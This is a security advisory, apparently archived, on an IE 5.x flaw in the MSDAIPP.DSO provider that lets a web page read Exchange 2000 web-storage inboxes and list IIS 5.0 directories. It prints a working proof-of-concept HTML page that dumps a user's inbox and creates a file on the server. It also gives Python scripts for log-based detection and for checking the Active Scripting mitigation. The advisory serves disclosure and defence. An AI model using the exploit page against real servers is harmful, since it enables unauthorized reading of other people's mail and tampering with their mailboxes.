COMMAND

    IE

SYSTEMS AFFECTED

    IE 5.x (Win2K, probably others) but interaction with IIS 5.0 (or Exchange web storage) is required

PROBLEM

    The following is based on Georgi Guninski's security advisory #40.
    If a malicious web page is browsed with IE, it is possible to list
    the directories of arbitrary IIS 5.0 servers to which the browsing
    user has access.  Under certain circumstances it is also possible
    to read the user's email or folders if they are stored on an
    Exchange 2000 server with web storage (which uses IIS 5.0).  It is
    also possible to create (and probably modify) files on the Exchange
    2000 server with web storage.

    This is a complex problem.  The cause seems to be the "Microsoft OLE
    DB Provider for Internet Publishing" (MSDAIPP.DSO).  Basically it
    provides a scripting interface for accessing and manipulating
    objects on IIS 5.0 or in web storage.  The problem is that it allows
    connecting to arbitrary servers, not only to the server from which
    the HTML page was loaded.  What is worse, if the IIS 5.0 server is
    in the "Local intranet zone", IE by default authenticates to it
    automatically without prompting the user.

    Here is an example.  The following example msdaippdemo.html works
    for me; I don't know whether it works for you, so let me know if it
    does not.  msdaippdemo.html may reside anywhere on the Internet.  It
    contains two "variables" that must be changed: INTRASERVER and
    USERNAME.  If msdaippdemo.html is browsed with IE 5.x by user
    USERNAME (in an NT DOMAIN) and INTRASERVER is IIS 5.0 with Exchange
    2000 with web storage (note: INTRASERVER must be a name which is in
    the "Local intranet zone" in the context of USERNAME), then an
    attacker may obtain all the messages in USERNAME's inbox and send
    them to an arbitrary server; in addition a file
    "newlycreatedfile.html" will be created in USERNAME's inbox.  For
    the attack to succeed the attacker must know the names INTRASERVER
    and USERNAME (and change them in msdaippdemo.html), but if the
    attacker is an insider in the NT DOMAIN he knows both of them, so
    basically it allows playing with other people's Exchange 2000 web
    storage mailboxes.  If INTRASERVER is running just plain IIS 5.0
    with Indexing Service enabled, a directory listing will be obtained
    if you edit the example a little: change the Data Source to

        Data Source=http://INTRASERVER/

    msdaippdemo.html:

    <HTML>
    Written by Georgi Guninski
    <SCRIPT>
    function f()
    {
        conn=new ActiveXObject("ADODB.Connection");
        conn.ConnectionString='Provider=MSDAIPP.DSO.1;Data Source=http://INTRASERVER/exchange/USERNAME/inbox';
        //change INTRASERVER and USERNAME with real values
        rec=new ActiveXObject("ADODB.Record");
        conn.Open();
        rs=new ActiveXObject("ADODB.Recordset");
        rs.Open("SELECT * from SCOPE()",conn);
        win=window.open("about:blank");
        win.document.open();
        // DISPLAYS ALL MESSAGES FROM USER'S INBOX
        while (!rs.EOF)
        {
            for(i=0;i<rs.Fields.Count;i++)
            {
                win.document.writeln(rs.Fields(i).Name+"="+rs.Fields(i).Value+"<BR>");
            }
            rs.MoveNext();
        }
        rec.Open ("newlycreatedfile.html",conn,3,0); //create file newlycreatedfile.html
        win.document.close();
    }
    setTimeout("f()",1000);
    </SCRIPT>
    </HTML>
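    From the server's side, the operations the demo drives through
    MSDAIPP.DSO reach IIS 5.0 / Exchange web storage as HTTP requests
    that IIS writes to its W3C extended log, so the IIS log is where a
    defender can see mailboxes being searched or files being created on
    a user's behalf by a browser-bound client.  The following Python
    script is an added example (not part of Guninski's advisory or of
    any Microsoft tool): it parses W3C log records by their #Fields
    header and flags WebDAV-style methods against the Exchange virtual
    root.  The mapping of the provider's operations to WebDAV methods
    (SEARCH for the SCOPE() query, PUT for the file creation, PROPFIND
    for listings) is an assumption of this example, and the log lines,
    host names and user agents are constructed.

```python
"""Flag WebDAV-style requests against Exchange web storage in IIS W3C logs.

Added example for the MSDAIPP.DSO advisory; not code from the advisory.
"""
from dataclasses import dataclass

# Methods a DAV client would use for the listing / searching / creating
# operations the advisory describes.  Which method the OLE DB provider
# emits for each operation is an assumption of this example.
SUSPECT_METHODS = {"SEARCH", "PROPFIND", "PUT", "MKCOL", "PROPPATCH",
                   "MOVE", "COPY", "DELETE"}


@dataclass
class Hit:
    time: str
    client: str
    user: str
    method: str
    path: str
    status: str
    agent: str


def parse_w3c(lines):
    """Yield one dict per record, naming columns from the #Fields header."""
    fields = None
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if line.startswith("#"):          # #Software, #Version, #Date ...
            continue
        if fields is None:
            raise ValueError("log record seen before a #Fields header")
        values = line.split()
        if len(values) != len(fields):    # malformed: skip rather than misalign
            continue
        yield dict(zip(fields, values))


def find_webdav_hits(lines, prefix="/exchange/"):
    """Return records whose method is a DAV write/search and whose path is
    under `prefix` (use "/" to watch a plain IIS 5.0 server as a whole)."""
    hits = []
    for rec in parse_w3c(lines):
        method = rec.get("cs-method", "").upper()
        path = rec.get("cs-uri-stem", "")
        if method in SUSPECT_METHODS and path.lower().startswith(prefix):
            hits.append(Hit(time=rec.get("time", "-"), client=rec.get("c-ip", "-"),
                            user=rec.get("cs-username", "-"), method=method,
                            path=path, status=rec.get("sc-status", "-"),
                            agent=rec.get("cs(User-Agent)", "-")))
    return hits


def summarize(hits):
    """Count hits per (authenticated user, client address): the same NT user
    issuing DAV searches and writes from a workstation is the pattern the
    advisory describes."""
    counts = {}
    for h in hits:
        key = (h.user, h.client)
        counts[key] = counts.get(key, 0) + 1
    return counts


# Constructed sample log (W3C extended format); not real traffic.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2000-12-01 09:00:00
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2000-12-01 09:00:01 10.0.0.5 DOMAIN\alice 10.0.0.2 80 GET /exchange/alice/inbox/ - 200 Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
2000-12-01 09:00:02 10.0.0.5 DOMAIN\alice 10.0.0.2 80 SEARCH /exchange/alice/inbox/ - 207 Microsoft+Data+Access+Internet+Publishing+Provider+DAV
2000-12-01 09:00:03 10.0.0.5 DOMAIN\alice 10.0.0.2 80 PUT /exchange/alice/inbox/newlycreatedfile.html - 201 Microsoft+Data+Access+Internet+Publishing+Provider+DAV
2000-12-01 09:00:04 10.0.0.7 - 10.0.0.2 80 GET /default.htm - 200 Mozilla/4.0
"""

if __name__ == "__main__":
    found = find_webdav_hits(SAMPLE_LOG.splitlines())
    for h in found:
        print(f"{h.time} {h.client} {h.user} {h.method} {h.path} {h.status} {h.agent}")
    print(summarize(found))
```

    The plain GET requests from the same user are deliberately not
    flagged: reading one's own inbox through Outlook Web Access is
    normal, whereas a SEARCH followed by a PUT into the inbox is the
    signature of the demo page above.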

SOLUTION

    To solve this particular issue, disable Active Scripting, though we
    do not recommend using IE for browsing the Internet at all because
    this is dangerous.
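    Since msdaippdemo.html "may reside anywhere on the Internet", the
    zone whose Active Scripting setting matters is the Internet zone
    (zone 3), not the Local intranet zone that the IIS server sits in.
    The following Python script is an added example, not part of the
    advisory: it reads an exported .reg file of the per-user
    Internet Settings\Zones keys and reports the Active Scripting policy
    (URL action 1400, policy values 0 = enable, 1 = prompt, 3 = disable)
    for each zone, so an administrator can confirm the mitigation was
    applied.  The two registry excerpts are constructed; the key path
    and value names are the standard IE ones.

```python
"""Check an exported .reg of IE zone settings for the Active Scripting fix.

Added example for the MSDAIPP.DSO advisory; not code from the advisory.
"""
import re

# URL action 1400 is "Active scripting".  Policy values are the standard
# IE zone settings: 0 = enable, 1 = prompt, 3 = disable.
ACTIVE_SCRIPTING = "1400"
POLICY = {0: "enable", 1: "prompt", 3: "disable"}
ZONE_NAMES = {0: "My Computer", 1: "Local intranet", 2: "Trusted sites",
              3: "Internet", 4: "Restricted sites"}

ZONE_KEY = re.compile(
    r"^\[HKEY_(?:CURRENT_USER|LOCAL_MACHINE)\\Software\\Microsoft\\Windows"
    r"\\CurrentVersion\\Internet Settings\\Zones\\(\d)\]$", re.IGNORECASE)
DWORD_VALUE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')


def parse_zone_export(reg_text):
    """Return {zone_number: {value_name: int}} from .reg text (pass the file
    contents as a str; real exports are UTF-16, so decode before calling)."""
    zones = {}
    current = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        m = ZONE_KEY.match(line)
        if m:
            current = int(m.group(1))
            zones.setdefault(current, {})
            continue
        if line.startswith("["):   # some other key: ignore until the next zone
            current = None
            continue
        m = DWORD_VALUE.match(line)
        if m and current is not None:
            zones[current][m.group(1)] = int(m.group(2), 16)
    return zones


def active_scripting_policy(zones, zone):
    """Map the zone's 1400 dword to enable/prompt/disable.  Returns None when
    the value is absent, which means the zone template default applies (for
    the Internet zone that default is 'enable')."""
    val = zones.get(zone, {}).get(ACTIVE_SCRIPTING)
    if val is None:
        return None
    return POLICY.get(val, f"unknown({val})")


def report(reg_text):
    """Zone name -> Active Scripting policy for every zone in the export."""
    zones = parse_zone_export(reg_text)
    return {ZONE_NAMES.get(z, str(z)): active_scripting_policy(zones, z)
            for z in sorted(zones)}


# Constructed excerpts of "regedit /e" output; not taken from a real machine.
EXPORT_DEFAULT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"WarnOnPost"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"DisplayName"="Local intranet"
"1400"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"DisplayName"="Internet"
"1400"=dword:00000000
"""

# Same export after Active Scripting was disabled for the Internet zone.
EXPORT_HARDENED = EXPORT_DEFAULT.replace(
    'Zones\\3]\n"DisplayName"="Internet"\n"1400"=dword:00000000',
    'Zones\\3]\n"DisplayName"="Internet"\n"1400"=dword:00000003')

if __name__ == "__main__":
    print("before:", report(EXPORT_DEFAULT))
    print("after: ", report(EXPORT_HARDENED))
```

    A value of "prompt" for the Internet zone would still let the user
    click through, so the check treats only "disable" as the fix the
    advisory recommends.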

    secure@microsoft.com wrote  "Visiting malicious  web sites  is not
    real exploit scenario"